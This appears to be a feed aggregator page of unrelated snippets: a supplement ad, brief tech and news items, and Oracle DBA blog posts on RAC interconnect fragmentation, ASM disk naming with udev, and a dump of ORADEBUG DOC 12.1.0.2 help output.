
Improves the absorption of the products active ingredients.

Vitamins B6 and B12

Improve assimilation of the product and participate as catalyzers for a multitude of metabolic processes. EvoBolic is a product designed to guarantee maximum quality at the best price possible.

The range of HSN Sports products enjoy the very busy quality/price ratio in our catalogue. HSN Sports: from the Factory directly to your home (without intermediaries)

Price:31.73 € Special Price:23.16 €
Special Expires on: Jul 2, 2017


          Umfassender Schutz für Unternehmen: Mit o2 Business Protect powered by McAfee im Büro und unterwegs immer auf der sicheren Seite   
In Zeiten globaler Cyberangriffe ist für Unternehmen der Schutz sensibler Daten wichtiger denn je. Telefónica in Deutschland bietet mit o2 Business Protect einen geräteübergreifenden Virenschutz für alle Endgeräte innerhalb eines Unternehmens. Gerade im Hinblick auf die vielfältigen und permanent neu entstehenden Cyberbedrohungen sind der Schutz gegen Datenverlust und unbefugten Datenzugriff essentielle Kernelemente von o2 Business […]
          Kina ser Hongkong som ukrænkeligt kerneland trods aftale   
Officielt har Hongkong delvist selvstyre. Men Kina tolererer ikke den mindste slinger i valsen, siger ekspert.
          EC2 and Fedora: Still stuck at Fedora 8   

Amazon’s EC2 service is great for being able to roll out new servers quickly and easily. It’s also really nice because we don’t ever have to worry about physical hardware and can just spin up more instances as we need them for experimenting or whatever.

Unfortunately, they’re still stuck in the dark ages with the newest AMIs available for Fedora being Fedora 8 based. With Fedora 12 around the corner, that’s two years old — something of an eternity in the pace of distribution development. I’d love to help out and build newer images, but while anyone can publish an AMI and make it public, you can’t publish newer kernel images, which really would be needed to use the newer system.

So, if you’re reading this at Amazon or know of someone I can talk with to try to move this forward, please let me know (katzj AT fedoraproject DOT org). I’d really strongly prefer to continue with Fedora and RHEL based images for our systems as opposed to starting to spin up Ubuntu images for the obvious reasons of familiarity.

Comments
          Matt Zimmerman’s summary of development plans for Ubuntu 10.10   
Ubuntu CTO Matt Zimmerman just blogged a collection of links to Maverick development plans, from the Desktop, Server, Foundations and Kernel teams.
          interconnect fragmentation kills the cluster   
On a particular Oracle 2 node cluster (12.1) we faced random instances failing. Servicerequests at Oracle were open with limited result, as it was quite random and we could not link it to any trigger.
As it looked somehow like a communication problem between the 2 nodes, network team has checked the switches involved - without any outcome.
Even crashing instances were a problem already, it get worse one day when one node rebooted (according to the clusters alert.log and cssd.log due to network heartbeat issues) and then the clusterstack did not start anymore.

2016-12-12 03:35:34.203 [CLSECHO(54825)]CRS-10001: 12-Dec-16 03:35 AFD-9204: AFD device driver installed or loaded status: 'false' 
2016-12-12 09:17:25.698 [OSYSMOND(1247)]CRS-8500: Oracle Clusterware OSYSMOND process is starting with operating system process ID 1247
2016-12-12 09:17:25.699 [CSSDAGENT(1248)]CRS-8500: Oracle Clusterware CSSDAGENT process is starting with operating system process ID 1248
2016-12-12 09:17:25.854 [OCSSD(1264)]CRS-8500: Oracle Clusterware OCSSD process is starting with operating system process ID 1264
2016-12-12 09:17:26.899 [OCSSD(1264)]CRS-1713: CSSD daemon is started in hub mode
2016-12-12 09:17:32.220 [OCSSD(1264)]CRS-1707: Lease acquisition for node yyy2 number 2 completed
2016-12-12 09:17:33.280 [OCSSD(1264)]CRS-1605: CSSD voting file is online: ORCL:ASM_OCR_VOTE_1; details in /xxx/app/grid/diag/crs/yyy1/crs/trace/ocssd.trc.
2016-12-12 09:17:33.289 [OCSSD(1264)]CRS-1672: The number of voting files currently available 1 has fallen to the minimum number of voting files required 1.
2016-12-12 09:27:25.925 [CSSDAGENT(1248)]CRS-5818: Aborted command 'start' for resource 'ora.cssd'. Details at (:CRSAGF00113:) {0:0:22951} in /xxx/app/grid/diag/crs/yyy2/crs/trace/ohasd_cssdagent_root.trc.
2016-12-12 09:27:25.925 [OCSSD(1264)]CRS-1656: The CSS daemon is terminating due to a fatal error; Details at (:CSSSC00012:) in /xxx/app/grid/diag/crs/yyy2/crs/trace/ocssd.trc
2016-12-12 09:27:25.926 [OCSSD(1264)]CRS-1603: CSSD on node yyy2 shutdown by user.
Mon Dec 12 09:27:30 2016
Errors in file /xxx/app/grid/diag/crs/yyy2/crs/trace/ocssd.trc (incident=857):
CRS-8503 [] [] [] [] [] [] [] [] [] [] [] []
Incident details in: /xxx/app/grid/diag/crs/yyy/crs/incident/incdir_857/ocssd_i857.trc

CSS trace is filled with messages reporting no connectivity with node1:
2016-12-12 09:27:20.375584 : CSSD:3154114304: clssscWaitOnEventValue: after CmInfo State val 3, eval 1 waited 1000 with cvtimewait status 4294967186 
2016-12-12 09:27:20.585624 :GIPCHALO:3141216000: gipchaLowerSendEstablish: sending establish message for node '0x7f7f900a37e0 { host 'yyy1', haName '480e-0dfa-bf94-bbda', srcLuid c33a92f9-675f2c44, dstLuid 00000000-00000000 numInf 1, sentRegister 0, localMonitor 0, baseStream 0x7f7f9009b110 type gipchaNodeType12001 (20), nodeIncarnation 9ec9e8e8-682809fa incarnation 2 flags 0x102804}'
2016-12-12 09:27:20.633907 : CSSD:3635484416: clsssc_CLSFAInit_CB: System not ready for CLSFA initialization
2016-12-12 09:27:20.633912 : CSSD:3635484416: clsssc_CLSFAInit_CB: clsfa fencing not ready yet
2016-12-12 09:27:20.656587 : CSSD:3124418304: clssnmvDHBValidateNCopy: node 1, yyy1, has a disk HB, but no network HB, DHB has rcfg 371663236, wrtcnt, 11120596, LATS 232008644, lastSeqNo 11120595, uniqueness 1476197219, timestamp 1481534839/2789302712
2016-12-12 09:27:20.868210 : CSSD:3119687424: clssnmSendingThread: Connection pending for node yyy1, number 1, flags 0x00000002
2016-12-12 09:27:21.375702 : CSSD:3154114304: clssscWaitOnEventValue: after CmInfo State val 3, eval 1 waited 1000 with cvtimewait status 4294967186
2016-12-12 09:27:21.585813 :GIPCHALO:3141216000: gipchaLowerSendEstablish: sending establish message for node '0x7f7f900a37e0 { host 'yyy1', haName '480e-0dfa-bf94-bbda', srcLuid c33a92f9-675f2c44, dstLuid 00000000-00000000 numInf 1, sentRegister 0, localMonitor 0, baseStream 0x7f7f9009b110 type gipchaNodeType12001 (20), nodeIncarnation 9ec9e8e8-682809fa incarnation 2 flags 0x102804}'
2016-12-12 09:27:21.634038 : CSSD:3635484416: clsssc_CLSFAInit_CB: System not ready for CLSFA initialization
2016-12-12 09:27:21.634046 : CSSD:3635484416: clsssc_CLSFAInit_CB: clsfa fencing not ready yet
2016-12-12 09:27:21.657538 : CSSD:3124418304: clssnmvDHBValidateNCopy: node 1, yyy1, has a disk HB, but no network HB, DHB has rcfg 371663236, wrtcnt, 11120597, LATS 232009644, lastSeqNo 11120596, uniqueness 1476197219, timestamp 1481534840/2789303712
2016-12-12 09:27:21.868336 : CSSD:3119687424: clssnmSendingThread: Connection pending for node yyy1, number 1, flags 0x00000002
2016-12-12 09:27:22.375830 : CSSD:3154114304: clssscWaitOnEventValue: after CmInfo State val 3, eval 1 waited 1000 with cvtimewait status 4294967186
2016-12-12 09:27:22.586063 :GIPCHALO:3141216000: gipchaLowerSendEstablish: sending establish message for node '0x7f7f900a37e0 { host 'yyy1', haName '480e-0dfa-bf94-bbda', srcLuid c33a92f9-675f2c44, dstLuid 00000000-00000000 numInf 1, sentRegister 0, localMonitor 0, baseStream 0x7f7f9009b110 type gipchaNodeType12001 (20), nodeIncarnation 9ec9e8e8-682809fa incarnation 2 flags 0x102804}'
2016-12-12 09:27:22.634195 : CSSD:3635484416: clsssc_CLSFAInit_CB: System not ready for CLSFA initialization
2016-12-12 09:27:22.634203 : CSSD:3635484416: clsssc_CLSFAInit_CB: clsfa fencing not ready yet

After even more investigation on the Network another SR was filed.

Due to previous SRs oswatcher was installed already, and there we found the important information in the netstats segment:

zzz ***Fri Dec 9 14:54:54 GMT 2016 
Ip:
13943376329 total packets received
129843 with invalid addresses
0 forwarded
0 incoming packets discarded
11934989273 incoming packets delivered
11631767391 requests sent out
2 outgoing packets dropped
148375 fragments dropped after timeout
2498052793 reassemblies required
494739589 packets reassembled ok
353229 packet reassembles failed
411073325 fragments received ok
2109526776 fragments created

and after 2 minutes:
zzz ***Fri Dec 9 14:56:55 GMT 2016 
Ip:
13943469180 total packets received
129849 with invalid addresses
0 forwarded
0 incoming packets discarded
11935067348 incoming packets delivered
11631828206 requests sent out
2 outgoing packets dropped
148375 fragments dropped after timeout
2498069258 reassemblies required
494741345 packets reassembled ok
359542 packet reassembles failed
411073565 fragments received ok
2109528513 fragments created

The important part are the 6313 packet reassembles failed. In comparison to 16465 reassemblies required.

This led to some notes which describe both our symptoms (instance and cluster stack failure)

RHEL 6.6: IPC Send timeout/node eviction etc with high packet reassembles failure (Doc ID 2008933.1)

and

The CRSD is Intermediate State and Not Joining to the Cluster (Doc ID 2168576.1)



Reassembly happens when the sender wants so send more data than fits into a single packet. In this cluster the MTU size is 1500 - and in our example we had 16465 datagrams which needed to be reassembled, but 6131 failed. There are some variables in the Linux kernel, they can affect the buffer used in kernel to reassembly fragmented datagrams.

The solution for our system was to increase 2 parameters:

net.ipv4.ipfrag_high_thresh = 16777216
net.ipv4.ipfrag_low_thresh = 15728640

These can be changed in the running system in
/proc/sys/net/ipv4/ipfrag_low_thresh
/proc/sys/net/ipv4/ipfrag_high_thresh
and for persistent changes in sysctl.conf

Unfortunately these parameters were not mentioned in any of the prerequisit scripts I found.

With all these knowledge, we identified an important difference to other clusters: This one is the only with MTU 1500 - so much more fragmented packages needed carehere.

After the issue itself was solved, I wondered if it can be found on a vanilla 12.1 crs installation.
(vanilla in comparison to our setup where oswatcher was installed due to the first SRs).
Yes, our beloved -MGMTDB holds the information already! It's in the documentation as well (Troubleshooting Oracle Clusterware) and in the output of oclumon dumpnodeview I can see
IPReasFail - Number of failures detected by the IPv4 reassembly algorithm
Node: yyy1 Clock: '16-11-26 06.55.27 Etc/GMT' SerialNo:443 
NICS:
bond0 netrr: 159.021 netwr: 181.688 neteff: 340.709 nicerrors: 0 pktsin: 412 pktsout: 358 errsin: 0 errsout: 0 indiscarded: 0 outdiscarded: 0 inunicast: 412 innonunicast: 0 type: PUBLIC
lo netrr: 37.722 netwr: 37.722 neteff: 75.443 nicerrors: 0 pktsin: 95 pktsout: 95 errsin: 0 errsout: 0 indiscarded: 0 outdiscarded: 0 inunicast: 95 innonunicast: 0 type: PUBLIC
bond1 netrr: 2350.313 netwr: 42989.510 neteff: 45339.823 nicerrors: 0 pktsin: 1927 pktsout: 31345 errsin: 0 errsout: 0 indiscarded: 0 outdiscarded: 0 inunicast: 1927 innonunicast: 0 type: PRIVATE
PROTOCOL ERRORS:
IPHdrErr: 0 IPAddrErr: 102203 IPUnkProto: 0 IPReasFail: 59886 IPFragFail: 0 TCPFailedConn: 12598 TCPEstRst: 335559 TCPRetraSeg: 67276584 UDPUnkPort: 40134 UDPRcvErr: 0

Unfortunately the format is kind of clumsy - I will need to dig into it's tables for a better output - especially for quick but powerful reports during problems.


During my research, I discovered it's not an oracle-only problem, others are affected as well (and provide a great description).






          handling disks for ASM - when DB, Linux and Storage admins work together   
A proper management of ASM Disks can be a complicated task.

On DOAG2015 I discussed with Martin Bach about the concept in my current company, where we implemented a setting which is consistent, robust and enables Storage, Linux and DB admins to work together easily.

As we started to think about ASM when 10.1 was out we tried to evaluate our possibility. asmlib was discarded quite early as it only increased complexity without additional value: We have a SAN (fibre channel) infrastructure with 2 separated fabrics. So a multipath configuration is needed. ASM (or asmlib)  can not handle this, so a proper multipath configuration is needed at all. Also asmlib hides storage details from DBAs/ASM-Admins, where we wanted to enable every person involved know as many details as possible easily.

We also saw ASM sometimes takes a long time to scan for new disks (every time you access v$asm_disks - so use v$asm_disk_stat as this view does not rescan but only shows infos about devices it has in SGA already) if there are many "files" (devices) in asm_diskstring.

asm_diskstring

We set asm_diskstring to a dedicated directory. In our case it's called /appl/oracle/asm_disks/* This speeds up a rescan of all "disks", it's also a clear indicator of all disks ASM uses. There we have symlinks to devices in /dev/mapper/

symlinks

The symlink has this format:
/appl/oracle/asm_disks/360060e80167bd70000017bd700000007p1_p9500_b52_MONIQP01_000 -> /dev/mapper/360060e80167bd70000017bd700000007p1

Some informations about all the values we stored there:
360060e80167bd70000017bd700000007p1 is the WWN of the disk, together with it's partition (p1).  The WWN is very useful in every discussion with Storage Admins, as it identifies the LUN from their perspective. We decided to partition the disks. It's shown in our records that Linux Admins touches un-formatted devices more often than devices which are formatted already. There were also some cases in early tests when the first block of a disk was cached by the kernel. Both issues are addressed when we format every disk. If required partitioning can help do adapt alignments.
p9500 is a shortname which identifies the Storage box with a name we can use during discussions. It's somewhere within the WWN as well. So it's a pure redundancy. But it makes discussions much easier.
b52 is a shortname to identify the datacenter. As pur fabrics are spawned across several datacenters, sometimes it's nice to have a fast knowledge about the topology.
MONIQP01_000 is the label used in some Storage boxes. It contains the Diskgroup name and some number.  At the moment it's NOT the NAME of an ASM-disk, but this can be introduced easily.

As the name of a diskgroup is coded into our naming schema, it's not accepted to reuse a disk for some other diskgroup. (Technically it's still possible, we just agreed not to do so). Even it seems this limits the DBAs flexibility, there are good reasons to do so. Disks are sometimes created with dedicated settings/parameters for a special purpose. Reusing such disks in other DGs would cause strange and hard to find performance symptoms. So If disks are not needed anymore we always "destroy" them and re-create new if needed.

udev rules

Our udev ruleset on RedHat6 is quite simple:
the file /etc/udev/rules.d/41-multipath.rules contains such lines:
ACTION=="add|change", ENV{DM_NAME}=="360060e80167bd70000017bd700000007p1", OWNER:="oracle", MODE:="0660", GROUP:="asmadmin"
We do not do any mapping of names here - it's only there to set permissions.

multipath

The config in /etc/multipath.conf is quite simple, only parameters required for every specific storage vendor / product.


I can not say a lot about configurations outside if the Linux server, so both SAN fabrics and the storage system are "just working".





          ORADEBUG DOC 12.1.0.2   
this is just an online docu of ORADEBUG DOC in 12.1.0.2.
The general comments from Tanel Poder apply to this version as well.




SQL> oradebug doc

Internal Documentation
**********************

EVENT Help on events (syntax, event list, ...)
COMPONENT [<comp_name>] List all components or describe <comp_name>

ORADEBUG DOC EVENT

SQL> oradebug doc event

Event Help:
***********

Formal Event Syntax
--------------------
<event_spec> ::= '<event_id> [<event_scope>]
[<event_filter_list>]
[<event_parameters>]
[<action_list>]
[off]'

<event_id> ::= <event_name | number>[<target_parameters>]

<event_scope> ::= [<scope_name>: scope_parameters]

<event_filter> ::= {<filter_name>: filter_parameters}

<action> ::= <action_name>(action_parameters)

<action_parameters> ::= <parameter_name> = [<value>|<action>][, ]

<*_parameters> ::= <parameter_name> = <value>[, ]


Some Examples
-------------
* Set event 10235 level 1:
alter session set events '10235';

* Set events SQL_TRACE (a.k.a. 10046) level 1:
alter session set events 'sql_trace';

* Turn off event SQL_TRACE:
alter session set events 'sql_trace off';

* Set events SQL_TRACE with parameter <plan_stat> set to 'never'
and parameter <wait> set to 'true':
alter session set events 'sql_trace wait=true, plan_stat=never';

* Trace in-memory the SQL_MONITOR component (the target) and all its
sub-components at level high. Get high resolution time for each
trace:
alter session set events 'trace[sql_mon.*] memory=high,
get_time=highres';

* On-disk trace PX servers p000 and p005 for components 'sql_mon'
and 'sql_optimizer' (including sub-components) at level highest:
alter system set events 'trace[sql_mon | sql_optimizer.*]
{process: pname = p000 | process: pname=p005}';

* Same as above but only when SQL id '7ujay4u33g337' is executed:
alter system set events 'trace[sql_mon | sql_optimizer.*]
[sql: 7ujay4u33g337]
{process: pname = p000 | process: pname=p005}';

* Execute an action immediatly by using 'immediate' for the event
name:
alter session set events 'immediate eventdump(system)'

* Create an incident labeled 'table_missing' when external error
942 is signaled by process id 14534:
alter session set events '942 {process: 14534}
incident(table_missing)';


Notes
-----
* Implicit parameter level is 1 by default
e.g. '10053' is same as '10053 level 1'

* Event target (see [<target_parameters>] construct) is only
supported by specific events like the TRACE[] event

* <event_scope> and/or <event_filter> are constructs
that can be used for any event

* Same event can be set simultaneously for a different scope or
target but not for different filters.

* '|' character can be used to select multiple targets, scope or
filters.

E.g. 'sql_trace [sql: sql_id=g3yc1js3g2689 | sql_id=7ujay4u33g337]'

* '=' sign is optional in <*_parameters>

E.g. 'sql_trace level 12';

* Like PL/SQL, no need to specify the parameter name for target,
scope, filters and action. Resolution is done by position in
that case:

E.g. 'sql_trace [sql: g3yc1js3g2689 | 7ujay4u33g337]'


Help sub-topics
---------------

NAME [<event_name>] List all events or describe <event_name>
SCOPE [<scope_name>] List all scopes or describe <scope_name>
FILTER [<filter_name>] List all filters or describe <filter_name>
ACTION [<action_name>] List all actions or describe <action_name>


SQL> spool off


ORADEBUG DOC EVENT NAME

SQL> oradebug doc event name

Events in library DIAG:
------------------------------
trace[] Main event to control UTS tracing
disable_dde_action[] Event used by DDE to disable actions
ams_trace[] Event to dump ams performance trace records
ams_rowsrc_trace[] Event to dump ams row source tracing
sweep_verification Event to enable sweep file verification
enable_xml_inc_staging Event to enable xml incident staging format
dbg[] Event to hook dbgtDbg logging statements

Events in library RDBMS:
------------------------------
wait_event[] event to control wait event post-wakeup actions
alert_text event for textual alerts
trace_recursive event to force tracing recursive SQL statements
clientid_overwrite event to overwrite client_identifier when client_info is set
sql_monitor event to force monitoring SQL statements
sql_monitor_test event to test SQL monitoring
eventsync_tac Event posted from events syncing tac
sql_trace event for sql trace
pmon_startup startup of pmon process
background_startup startup of background processes
db_open_begin start of db open operation
test_gvtf test GV$() Table Tunction
fault Event used to inject fault in RDBMS kernel
gcr_systest gcr_systest
em_express EM Express debug event
emx_control event to control em express
emx_test_control event to control em express testing
awrdiag[] AWR Diagnostic Event
msgq_trace event to control msgq tracing
ipclw_trace event to control ipclw tracing
kbc_fault event to control container fault injection
asm_corruption_trace event to control ASM corruption tracing
kxdrs_sim debug event to simulate certain conditions in kxdrs layer

kcfio_debug debug event to debug kcfio based on event level

krbabrstat_fault event to control krbabrstat fault injection
periodic_dump[] event for periodically dumping

Events in library GENERIC:
------------------------------
kg_event[] Support old error number events (use err# for short)

Events in library CLIENT:
------------------------------
oci_trace event for oci trace

Events in library LIBCELL:
------------------------------
libcell_stat libcell statistics level specification
cellclnt_skgxp_trc_ops Controls to trace SKGXP operations
cellclnt_ossnet_trc Controls to trace IP affinity in ossnet
cellclnt_high_lat_ops Control to trace High-latency I/O operations
diskmon_sim_ops[] Diskmon simulation events
cellclnt_read_outlier_limit Control to trace read I/O outliers
cellclnt_write_outlier_limit Control to trace write I/O outliers
cellclnt_lgwrite_outlier_limit Control to trace log write I/O outliers
cellclnt_sparse_mode Mode of how to handle sparse buffers

Events in library ADVCMP:
------------------------------
arch_comp_level[] arch_comp_level[<ulevel, 1-7>]
ccmp_debug columnar compression debug event
inmemory_nobasic disable KDZCF_IMC_BASIC implementation
inmemory_nohybrid disable KDZCF_IMC_HYBRID implementation
ccmp_align columnar compression enable alignment
ccmp_countstar columnar compression enable count(*) optimization
ccmp_dumpunaligned columnar compression dump dbas of unaligned CUs
ccmp_rbtree columnar compression switch back to rb tree
inmemory_force_ccl inmemory force column compression levels
inmemory_imcu[] inmemory_imcu[<ulevel= nocomp|dml|query_low|query_high|capacity_low|capacity_high>]

Events in library PLSQL:
------------------------------
plsql_event[] Support PL/SQL error number events


SQL> spool off


ORADEBUG DOC EVENT NAME <event_name>
SQL> ORADEBUG DOC EVENT NAME trace

trace: Main event to control UTS tracing

Usage
-------
trace [ component <string>[0] ]
disk < default | lowest | low | medium | high | highest | disable >,
memory < default | lowest | low | medium | high | highest | disable >,
get_time < disable | default | seq | highres | seq_highres >,
get_stack < disable | default | force >,
operation <string>[32],
function <string>[32],
file <string>[32],
line <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME disable_dde_action

disable_dde_action: Event used by DDE to disable actions

Usage
-------
disable_dde_action [ action_name <string>[100] ]
facility <string>[20],
error <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME ams_trace

ams_trace: Event to dump ams performance trace records

Usage
-------
ams_trace [ relation <string>[30] ]

SQL> spool off


SQL> ORADEBUG DOC EVENT NAME ams_rowsrc_trace

ams_rowsrc_trace: Event to dump ams row source tracing

Usage
-------
ams_rowsrc_trace [ relation <string>[30] ]
level <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME dbg

dbg: Event to hook dbgtDbg logging statements

Usage
-------
dbg [ component <string>[0] ]
operation <string>[32],
function <string>[32],
file <string>[32],
line <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME wait_event

wait_event: event to control wait event post-wakeup actions

Usage
-------
wait_event [ name <string>[64] ]


SQL> ORADEBUG DOC EVENT NAME awrdiag

awrdiag: AWR Diagnostic Event

Usage
-------
awrdiag [ name <string>[64] ]
level <ub4>,
str1 <string>[256],
str2 <string>[256],
num1 <ub8>,
num2 <ub8>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME periodic_dump

periodic_dump: event for periodically dumping

Usage
-------
periodic_dump [ name <string>[64] ]
level <ub4>,
seconds <ub4>,
lifetime <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME kg_event

kg_event: Support old error number events (use err# for short)

Usage
-------
kg_event [ errno <ub4> ]
level <ub4>,
lifetime <ub4>,
armcount <ub4>,
traceinc <ub4>,
forever <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME diskmon_sim_ops
Error: "diskmon_sim_ops" not a known event/library name
Use <event_name>, <library_name> or <library_name>.<event_name>

SQL> spool off


SQL> ORADEBUG DOC EVENT NAME arch_comp_level

arch_comp_level: arch_comp_level[<ulevel, 1-7>]

Usage
-------
arch_comp_level [ ulevel <ub4> ]
ilevel <ub8>,
sortcols <ub4>,
cusize <ub4>,
analyze_amt <ub4>,
analyze_rows <ub4>,
analyze_minrows <ub4>,
mincusize <ub4>,
maxcusize <ub4>,
mincurows <ub4>,
align <ub4>,
rowlocks <ub4>,
maxcuhpctfree <ub4>,
guarantee_rll <ub4>,
cla_stride <ub4>,
dict_cla_stride <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME inmemory_imcu

inmemory_imcu: inmemory_imcu[<ulevel= nocomp|dml|query_low|query_high|capacity_low|capacity_high>]

Usage
-------
inmemory_imcu [ ulevel < invalid | nocomp | dml | query_low | query_high | capacity_low | capacity_high > ]
target_rows <ub4>,
source_maxbytes <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME plsql_event

plsql_event: Support PL/SQL error number events

Usage
-------
plsql_event [ errno <ub4> ]

SQL> spool off



ORADEBUG DOC EVENT SCOPE

SQL> oradebug doc event scope

Event scopes in library RDBMS:
------------------------------
SQL[] sql scope for RDBMS


SQL> spool off


ORADEBUG DOC EVENT SCOPE SQL
SQL> oradebug doc event scope sql

SQL: sql scope for RDBMS

Usage
-------
[SQL: sql_id <string>[20] ]


SQL> spool off



ORADEBUG DOC EVENT FILTER

SQL> ORADEBUG DOC EVENT FILTER

Event filters in library DIAG:
------------------------------
occurence filter to implement counting for event checks
callstack filter to only fire an event when a function is on the stack
eq filter to only fire an event when a == b
ne filter to only fire an event when a != b
gt filter to only fire an event when a > b
lt filter to only fire an event when a < b
ge filter to only fire an event when a >= b
le filter to only fire an event when a <= b
anybit filter to only fire an event when (a & b) != 0
allbit filter to only fire an event when (a & b) == b
nobit filter to only fire an event when (a & b) == 0
bet filter to only fire an event when b <= a <= c
nbet filter to only fire an event when a < b or a > c
in filter to only fire an event when a is equal to any b .. p
nin filter to only fire an event when a is not equal to any b .. p
streq filter to only fire an event when string s1 = s2 (up to <len> characters)
strne filter to only fire an event when string s1 != s2 (up to <len> characters)
tag filter to only fire an event when a tag is set

Event filters in library RDBMS:
------------------------------
wait filter for specific wait parameters and wait duration
process filter to set events only for a specific process
px filter to check identity of the process for fault injection

Event filters in library GENERIC:
------------------------------
errarg filter to set error events only for a specific error argument


SQL> spool off



ORADEBUG DOC EVENT FILTER <filter_name>
SQL> ORADEBUG DOC EVENT FILTER occurence

occurence: filter to implement counting for event checks

Usage
-------
{occurence: start_after <ub4>,
end_after <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER callstack

callstack: filter to only fire an event when a function is on the stack

Usage
-------
{callstack: fname <string>[64],
fprefix <string>[64],
maxdepth <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER eq

eq: filter to only fire an event when a == b

Usage
-------
{eq: a <ub8>,
b <ub8> }


SQL>

SQL> ORADEBUG DOC EVENT FILTER ne

ne: filter to only fire an event when a != b

Usage
-------
{ne: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER gt

gt: filter to only fire an event when a > b

Usage
-------
{gt: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER lt

lt: filter to only fire an event when a < b

Usage
-------
{lt: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER ge

ge: filter to only fire an event when a >= b

Usage
-------
{ge: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER le

le: filter to only fire an event when a <= b

Usage
-------
{le: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER anybit

anybit: filter to only fire an event when (a & b) != 0

Usage
-------
{anybit: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER allbit

allbit: filter to only fire an event when (a & b) == b

Usage
-------
{allbit: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER nobit

nobit: filter to only fire an event when (a & b) == 0

Usage
-------
{nobit: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER bet

bet: filter to only fire an event when b <= a <= c

Usage
-------
{bet: a <ub8>,
b <ub8>,
c <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER nbet

nbet: filter to only fire an event when a < b or a > c

Usage
-------
{nbet: a <ub8>,
b <ub8>,
c <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER in

in: filter to only fire an event when a is equal to any b .. p

Usage
-------
{in: a <ub8>,
b <ub8>,
c <ub8>,
d <ub8>,
e <ub8>,
f <ub8>,
g <ub8>,
h <ub8>,
i <ub8>,
j <ub8>,
k <ub8>,
l <ub8>,
m <ub8>,
n <ub8>,
o <ub8>,
p <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER nin

nin: filter to only fire an event when a is not equal to any b .. p

Usage
-------
{nin: a <ub8>,
b <ub8>,
c <ub8>,
d <ub8>,
e <ub8>,
f <ub8>,
g <ub8>,
h <ub8>,
i <ub8>,
j <ub8>,
k <ub8>,
l <ub8>,
m <ub8>,
n <ub8>,
o <ub8>,
p <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER streq

streq: filter to only fire an event when string s1 = s2 (up to <len> characters)

Usage
-------
{streq: s1 <string>[256],
s2 <string>[256],
len <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER strne

strne: filter to only fire an event when string s1 != s2 (up to <len> characters)

Usage
-------
{strne: s1 <string>[256],
s2 <string>[256],
len <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER tag

tag: filter to only fire an event when a tag is set

Usage
-------
{tag: tname <string>[64] }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER wait

wait: filter for specific wait parameters and wait duration

Usage
-------
{wait: minwait <ub8>,
p1 <ub8>,
p2 <ub8>,
p3 <ub8>,
_actual_wait_time <ub8> default 'evargn(pos=1)',
_actual_wait_p1 <ub8> default 'evargn(pos=2)',
_actual_wait_p2 <ub8> default 'evargn(pos=3)',
_actual_wait_p3 <ub8> default 'evargn(pos=4)' }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER process

process: filter to set events only for a specific process

Usage
-------
{process: ospid <string>[20],
orapid <ub4>,
pname <string>[20],
con_id <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER px

px: filter to check identity of the process for fault injection

Usage
-------
{px: slave_set <ub4>,
slave_num <ub4>,
local_slave_num <ub4>,
instance_id <ub4>,
dfo_number <ub4>,
oct <ub4>,
pxid <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER errarg

errarg: filter to set error events only for a specific error argument

Usage
-------
{errarg: arg1 <string>[50],
arg2 <string>[50],
arg3 <string>[50],
arg4 <string>[50],
arg5 <string>[50],
arg6 <string>[50],
arg7 <string>[50],
arg8 <string>[50] }


SQL> spool off




ORADEBUG DOC EVENT ACTION

SQL> ORADEBUG DOC EVENT ACTION

Actions in library DIAG:
---------------------------
evfunc - Get posting function name
evfile - Get posting file name
evline - Get posting file line number as ub8
evfmt - Get trace / log format string
evargc - Get count of event check arguments as a ub8
evargn - Get event check argument value as ub8
evargp - Get event check argument value as void *
evargs
- Get event check argument as string, with optional format
errargs - Get error argument as string
errargn - Get error argument as ub8
errargp - Get error argument as pointer
errargc - Get count of error arguments as a ub8
sum
- Compute a1 + a2 + ... + a15 as ub8 (zero if all NULL)
trace
- trace to disk; apply format to string arguments
% is an argument placeholder
\n and \t are supported. Use double \ as escape
sub - Compute a1 - a2 as ub8
add - Compute a1 + a2 as ub8
mod - Compute a1 modulo a2 as ub8
div - Compute a1 / a2 as ub8
mul - Compute a1 * a2 as ub8
incr - Increment ptr by offset
decr - Decrement ptr by offset
refn
- Dereference ptr-to-number: *(ub<numsize>*)(((ub1*)<ptr>)) + <offset>)
refp
- Dereference ptr-to-ptr: *(ub1**)(((ub1*)<ptr>)) + <offset>)
refs
- Dereference ptr-to-string: *(oratext **)(((ub1*)<ptr>) + <offset>)
Length is optional; NULL-terminated string is assumed
refsl
- Dereference ptr-to-string: *(oratext **)(((ub1*)<ptr>) + <offset>)
with ptr-to-length: *(ub<lensize>*)(((ub1*)<ptr>) + <lenoffset>)
dumpFrameContext - Dump Frame Context contents
dumpBuckets
kgsfdmp
dumpDiagCtx
dumpDbgecPopLoc
dumpDbgecMarks
